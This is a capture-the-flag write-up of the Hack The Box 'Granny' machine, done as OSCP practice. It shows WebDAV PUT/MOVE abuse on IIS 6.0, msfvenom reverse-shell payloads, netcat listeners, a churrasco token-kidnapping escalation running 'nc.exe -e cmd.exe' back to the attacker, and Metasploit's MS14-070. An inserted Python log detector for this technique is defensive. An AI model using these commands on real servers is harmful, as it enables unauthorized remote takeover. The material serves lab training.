Hack The Box: Granny Write-up (#34)

Joshua Surendran
10 min read · Nov 13, 2020

This is my 34th box out of 42 boxes for OSCP preparation. I am doing my best to learn and master the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

As usual, run a full TCP scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.15
  • -sC: Run the default Nmap scripts
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535

We get back the following result:

  • Port 80: Running HTTP service, Microsoft IIS httpd 6.0.
Nmap scan report for 10.10.10.15
Host is up (0.0090s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Date: Wed, 09 Sep 2020 07:04:07 GMT
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Only port 80 is open.

Let’s make quick mental notes.

  1. This will most likely be the entry point for our initial foothold on the box. The result makes it obvious that the server is running an outdated version of Microsoft IIS and is using the WebDAV protocol. A quick Google search says WebDAV is a protocol whose basic functionality includes enabling users to share, copy, move and edit files through a web server. In the Nmap results, the number of ‘Allowed Methods’ immediately draws our attention. PUT, MOVE, COPY and DELETE are dangerous HTTP methods that allow you to create, move and delete files on the web server.

Service Enumeration

Port 80 (HTTP service)

Let’s visit the page.

Nothing interesting here. Let’s run the gobuster scan.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.15/ -t 50 -o gobuster.txt
  • -w: Wordlist
  • -u: URL of the target
  • -t: Number of threads
  • -o: Output file

We get back the following results.

http://10.10.10.15:80/_private (Status: 301) [Size: 156]
http://10.10.10.15:80/_vti_log (Status: 301) [Size: 158]
http://10.10.10.15:80/_vti_inf.html (Status: 200) [Size: 1754]
http://10.10.10.15:80/_vti_bin (Status: 301) [Size: 158]
http://10.10.10.15:80/_vti_bin/_vti_adm/admin.dll (Status: 200) [Size: 195]
http://10.10.10.15:80/_vti_bin/_vti_aut/author.dll (Status: 200) [Size: 195]
http://10.10.10.15:80/_vti_bin/shtml.dll (Status: 200) [Size: 96]
http://10.10.10.15:80/aspnet_client (Status: 301) [Size: 161]
http://10.10.10.15:80/images (Status: 301) [Size: 152]
http://10.10.10.15:80/Images (Status: 301) [Size: 152]
http://10.10.10.15:80/postinfo.html (Status: 200) [Size: 2440]

Look into the directories and files that gobuster found. We don’t find anything useful.

Let’s run the Nikto scan as well.

nikto -h 10.10.10.15
  • -h: Target IP.

We get back the following results.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.15
+ Target Hostname: 10.10.10.15
+ Target Port: 80
+ Start Time: 2020-09-09 06:09:10 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
+ OSVDB-5646: HTTP method 'DELETE' allows clients to delete files on the web server.
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (PROPPATCH SEARCH PROPFIND LOCK UNLOCK MKCOL COPY listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_private/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 8018 requests: 0 error(s) and 32 item(s) reported on remote host
+ End Time: 2020-09-09 06:10:33 (GMT8) (83 seconds)

Nikto also confirmed the ‘Allowed HTTP Methods’. Let’s test the PUT method to create a file on the web server. Since this server is running Microsoft IIS, the file types it executes are ASP and ASPX. We can use the davtest tool to automate checking which file types can be created on the web server using the PUT method. Let’s test it out.

davtest --url http://10.10.10.15

We get back the following results.

Neither ASP nor ASPX is allowed, but files with the HTML and TXT extensions can be created. We also know from the Nmap scan that the MOVE method is allowed. We can create an HTML file with our reverse shell payload and use the MOVE method to rename the file to ASPX. This is only an assumption at this point. Let’s test it with the curl command.

The file is created and we can access it. Next, rename the file to ASPX with the MOVE method.

root@kali:/htb/Granny/10.10.10.15/recon# curl -X MOVE --header 'Destination:http://10.10.10.15/test.aspx' 'http://10.10.10.15/test.html'
root@kali:/htb/Granny/10.10.10.15/recon# curl http://10.10.10.15/test.aspx
This is a test

It works as expected.
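
From the defender's side, the PUT-then-MOVE rename shown above leaves a recognizable sequence in the IIS W3C logs. The following is an added example, not part of the original write-up, that correlates that sequence over a constructed sample log; the field selection, the 10-minute window and the function names are assumptions.

```python
import os
from datetime import datetime, timedelta

SCRIPT_EXTS = {".asp", ".aspx"}  # extensions IIS executes, per the write-up

# Constructed sample log, not captured from any server. The field selection
# is an assumption; the parser follows whatever the #Fields line declares.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2020-09-09 07:10:01 192.0.2.10 OPTIONS / 200
2020-09-09 07:10:05 192.0.2.10 PUT /test.html 201
2020-09-09 07:10:09 192.0.2.10 MOVE /test.html 201
2020-09-09 07:10:12 192.0.2.10 GET /test.aspx 200
2020-09-09 07:11:30 192.0.2.20 PUT /notes.txt 201
2020-09-09 07:12:02 192.0.2.20 GET /notes.txt 200
2020-09-09 07:13:40 192.0.2.30 GET /default.aspx 200
"""

def parse_w3c(text):
    """Yield one dict per request, keyed by the latest #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
            yield row

def find_put_move_exec(text, window=timedelta(minutes=10)):
    """Flag script requests whose base name was PUT, then MOVEd, by one client."""
    uploaded, moved, alerts = {}, set(), []
    for r in parse_w3c(text):
        uri = r["cs-uri-stem"].lower()
        base, ext = os.path.splitext(uri)
        if not r["sc-status"].startswith("2"):
            continue  # only successful requests change or run anything
        if r["cs-method"] == "PUT" and ext not in SCRIPT_EXTS:
            uploaded[base] = (uri, r["c-ip"], r["ts"])
        elif r["cs-method"] == "MOVE" and uploaded.get(base, ())[:2] == (uri, r["c-ip"]):
            # The Destination header is not among the logged fields, so the new
            # name is inferred from the next script request with the same base.
            moved.add(base)
        elif ext in SCRIPT_EXTS and base in moved and r["ts"] - uploaded[base][2] <= window:
            alerts.append({"uploader": uploaded[base][1], "uploaded": uploaded[base][0],
                           "executed": uri, "requested_by": r["c-ip"]})
    return alerts

if __name__ == "__main__":
    for alert in find_put_move_exec(SAMPLE_LOG):
        print(alert)
```

Because the rename target is inferred from the shared base name, a MOVE that also changes the base name is not caught by this heuristic; alerting on any successful PUT or MOVE from an unexpected client covers that case.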

Exploitation

Let’s generate an MSFvenom payload in ASPX format.

msfvenom -p windows/shell_reverse_tcp -f aspx lhost=10.10.14.31 lport=53 -o shell.aspx
  • -p: Payload
  • -f: File format
  • lhost: Kali Linux IP (attacker’s machine IP)
  • lport: The port the reverse shell connects back to
  • -o: Output filename

Rename the file.

mv shell.aspx shell.txt

Then upload the file to the web server and rename the file extension to ASPX.

root@kali:/htb/Granny/10.10.10.15/recon# curl -X PUT http://10.10.10.15/shell.txt --data-binary @shell.txt
root@kali:/htb/Granny/10.10.10.15/recon# curl -X MOVE --header 'Destination:http://10.10.10.15/shell.aspx' 'http://10.10.10.15/shell.txt'

Next, set up a Netcat listener in our Kali Linux.

root@kali:/htb/Granny# nc -nlvp 53
listening on [any] 53 ...

Execute the shell.aspx file either through the browser or curl command to send a shell back to our Kali Linux.

We get a shell! Unfortunately, we don’t have permission to read the user.txt file. For this, we need to escalate privilege.

You will notice that this shell keeps disconnecting after 40 seconds.

Privilege Escalation

Now download the Windows Exploit Suggester to identify missing patches on the Windows target machine that could potentially allow us to escalate privileges.

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git

Next, install the dependencies.

pip install xlrd --upgrade

Update the database.

./windows-exploit-suggester.py --update

It downloads the security bulletin database from Microsoft and saves it as an Excel spreadsheet in the current working directory.

Run the systeminfo command on the target machine, then copy the output and save it on your Kali Linux machine.

C:\WINDOWS\Temp>systeminfo
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 10 Hours, 40 Minutes, 56 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 776 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,312 MB
Page File: In Use: 158 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A

Next, run the windows-exploit-suggester.

python /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --database /opt/Windows-Exploit-Suggester/2020-09-09-mssb.xls --systeminfo systeminfo.txt

It outputs many vulnerabilities. I tried most of them, but none of them worked. Since we have a reverse shell in the context of “network service”, a service account, we should check its privileges.

The account has SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege enabled. We can use token impersonation techniques to escalate privileges to a SYSTEM shell. We can do this by using the JuicyPotato (x86 architecture) tool. Download the file on Kali Linux. Next, generate an MSFvenom payload in exe format.

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o reverse.exe

Set up an SMB share on our Kali Linux in the directory where you placed the JuicyPotato and reverse.exe files. Give a name to your share (my share name is ‘tools’).

python /usr/share/doc/python3-impacket/examples/smbserver.py tools .

Copy these 2 files (reverse.exe and JuicyPotato.exe) to the target machine.

copy \\10.10.14.31\tools\JuicyPotato-x86.exe C:\WINDOWS\TEMP\JuicyPotato-x86.exe
copy \\10.10.14.31\tools\reverse.exe C:\WINDOWS\TEMP\reverse.exe

Set a new Netcat listener on Kali Linux.

nc -nlvp 443

Next, run the following commands from the target machine.

C:\WINDOWS\TEMP\JuicyPotato.exe -l 1337 -p C:\WINDOWS\TEMP\reverse.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

I am still not getting a SYSTEM reverse shell. It seems like something is blocking this file from executing. After doing some research on Windows 2003 SP2 exploits, I found this page about the ‘Windows Privelege Escalation via Token Kidnapping’ vulnerability. The executable exploit file for this vulnerability can be found here. Download the exploit to Kali Linux and transfer it to the target machine. This exploit takes a command as an argument and executes it with SYSTEM privileges.

Nice! Since we know this shell is not stable, all we have to do is copy and paste the commands as fast as we can. I copied the nc.exe binary to the target machine. Then set up a Netcat listener in our Kali Linux.

nc -nlvp 443

Then from the target machine run the following command.

C:\WINDOWS\TEMP\churrasco.exe "C:\WINDOWS\TEMP\nc.exe 10.10.14.31 443 -e cmd.exe"

Go back to the listener. We get a SYSTEM shell.

Get the user flag.

Get the root flag.

Extra Contents (With Metasploit)

Since the above method is very painful due to the instability of the shell, I decided to do this with Metasploit as well.

First, generate a meterpreter reverse shell payload.

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.31 lport=53 -f aspx -o mshell.aspx

Rename the file to TXT and upload the file as we did earlier using the curl command.

root@kali:/htb/Granny/10.10.10.15/recon# mv mshell.aspx mshell.txt
root@kali:/htb/Granny/10.10.10.15/recon# curl -X PUT http://10.10.10.15/mshell.txt --data-binary @mshell.txt
root@kali:/htb/Granny/10.10.10.15/recon# curl -X MOVE --header 'Destination:http://10.10.10.15/mshell.aspx' 'http://10.10.10.15/mshell.txt'

Start Metasploit and configure it as below.

root@kali:~# msfconsole -q
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.14.31
lhost => 10.10.14.31
msf5 exploit(multi/handler) > set lport 53
lport => 53
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.31:53

Next, execute the uploaded meterpreter reverse shell payload with the curl command.

curl http://10.10.10.15/mshell.aspx

Check the multi handler. A new session is opened.

We get a stable meterpreter shell. Next, use the local exploit suggester module to see which exploits the system is vulnerable to.

We’ll test the 3rd exploit, MS14-070.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] Using configured payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.31
lhost => 10.10.14.31
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set lport 443
lport => 443
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 5
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

We get a new session.

We’re SYSTEM!

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Grandpa.
